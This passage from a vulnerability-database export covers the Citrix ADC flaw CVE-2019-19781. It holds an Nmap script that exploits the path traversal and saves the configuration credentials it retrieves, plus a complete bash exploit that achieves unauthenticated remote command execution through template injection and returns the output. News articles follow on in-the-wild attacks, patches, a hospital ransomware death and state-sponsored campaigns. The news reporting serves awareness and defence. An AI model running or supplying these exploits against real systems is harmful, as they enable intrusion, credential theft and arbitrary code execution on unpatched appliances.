10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33824"}, {"lastseen": "2020-01-19T23:06:56", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2020-01-11T00:00:00", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33794"}], "thn": [{"lastseen": "2020-09-21T11:50:01", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "[](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted the Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-09-21T10:34:14", "published": "2020-09-21T10:20:00", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-11T13:18:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "[](<https://1.bp.blogspot.com/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n\n\n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n\n\n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "modified": "2020-01-11T10:22:37", "published": "2020-01-11T10:21:00", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-24T07:27:25", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "[](<https://1.bp.blogspot.com/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n\n\n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[](<https://1.bp.blogspot.com/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n\n\n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "modified": "2020-01-24T07:05:37", "published": "2020-01-20T14:24:00", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-08T08:26:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781", "CVE-2020-8199"], "description": "[](<https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg>)\n\nCitrix yesterday issued new security patches for as many as [11 security flaws](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that affect its Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WAN Optimization edition (WANOP) networking products. \n \nSuccessful exploitation of these critical flaws could let unauthenticated attackers perform code injection, information disclosure, and even denial-of-service attacks against the gateway or the [authentication virtual servers](<https://docs.citrix.com/en-us/netscaler/12/aaa-tm/authentication-virtual-server.html>). \n \nCitrix confirmed that the aforementioned issues do not impact other virtual servers, such as load balancing and content switching virtual servers. \n \nAmong the affected Citrix SD-WAN WANOP appliances include models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. \n\n\n \nThe networking vendor also reiterated that these vulnerabilities were not connected to a previously fixed [zero-day NetScaler flaw](<https://thehackernews.com/2020/01/citrix-adc-patch-update.html>) (tagged as [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)) that allowed bad actors to perform [arbitrary code execution](<https://support.citrix.com/article/CTX267027>) even without proper authentication. \n \nIt also said there's no evidence the newly disclosed flaws are exploited in the wild and that barriers to exploitation of these flaws are high. \n \n\"Of the 11 vulnerabilities, there are six possible attacks routes; five of those have barriers to exploitation,\" Citrix's CISO Fermin Serna said. \"Two of the remaining three possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\" \n \nAlthough Citrix has refrained from publishing technical details of the vulnerabilities citing malicious actors' efforts to leverage the patches and the information to reverse engineer exploits, attacks on the management interface of the products could result in system compromise by an unauthenticated user, or through Cross-Site Scripting (XSS) on the management interface. \n \nAn adversary could also create a download link for a vulnerable device, which could result in the compromise of a local computer upon execution by an unauthenticated user on the management network. \n\n\n \nA second class of attacks concerns virtual IPs (VIPs), permitting an attacker to mount DoS against the Gateway or remotely scan the ports of the internal network. \n \n\"Attackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\" Citrix noted in its [advisory](<https://support.citrix.com/article/CTX276688>). \n \nIn addition, a separate vulnerability in Citrix Gateway Plug-in for Linux (CVE-2020-8199) would grant a local logged-on user of a Linux system to elevate their privileges to an administrator account on that system. \n \nAccording to a [Positive Technologies](<https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>) report last December, the traffic management and secure remote access applications are used by over 80,000 organizations across the world. \n \nIt's recommended that download and apply the latest builds for Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP appliances as soon as possible to mitigate risk and defend against potential attacks designed to exploit these flaws.\n", "modified": "2020-07-08T07:43:59", "published": "2020-07-08T07:43:00", "id": "THN:DABC62CDC9B66962217D9A8ABA9DF060", "href": "https://thehackernews.com/2020/07/citrix-software-security-update.html", "type": "thn", "title": "Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-18T15:48:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "description": "[](<https://1.bp.blogspot.com/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n\n\n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://1.bp.blogspot.com/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n\n\n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://1.bp.blogspot.com/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "modified": "2020-02-18T15:13:08", "published": "2020-02-18T15:06:00", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-15T09:43:41", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n\n\n[](<https://go.thn.li/contrast> \"cybersecurity\" )\n\n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN 